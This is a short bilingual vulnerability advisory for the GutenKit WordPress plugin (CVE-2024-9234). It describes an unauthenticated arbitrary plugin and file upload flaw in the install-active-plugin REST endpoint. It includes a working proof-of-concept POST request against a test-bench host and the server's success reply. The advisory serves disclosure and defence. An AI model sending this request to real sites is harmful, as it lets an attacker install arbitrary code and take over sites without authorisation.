
GutenKit <= 2.1.0 - Unauthentifizierter beliebiger Datei-Upload
GutenKit <= 2.1.0 - Unauthenticated Arbitrary File Upload
Das Plugin GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor für WordPress ist aufgrund einer fehlenden Berechtigungsprüfung in der Funktion install_and_activate_plugin_from_external() (REST-API-Endpunkt install-active-plugin) in allen Versionen bis einschließlich 2.1.0 anfällig für willkürliche Datei-Uploads. Dadurch können nicht authentifizierte Angreifer beliebige Plugins installieren und aktivieren oder die Funktionalität nutzen, um beliebige Dateien hochzuladen, die als Plugins getarnt sind.
Type: plugin
CVSS Score: 9.8
CVE: CVE-2024-9234
Slug: gutenkit-blocks-addon
Download-Link: Herunterladen von gutenkit-blocks-addon Version 2.1.0
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
Content-Type: application/json
Content-Length: 114
{
"plugin": "https://downloads.wordpress.org/plugin/popularis-extra.1.2.6.zip",
"slug": "popularis-extra"
}
{"success":true,"data":"Plugin installed successfully!"}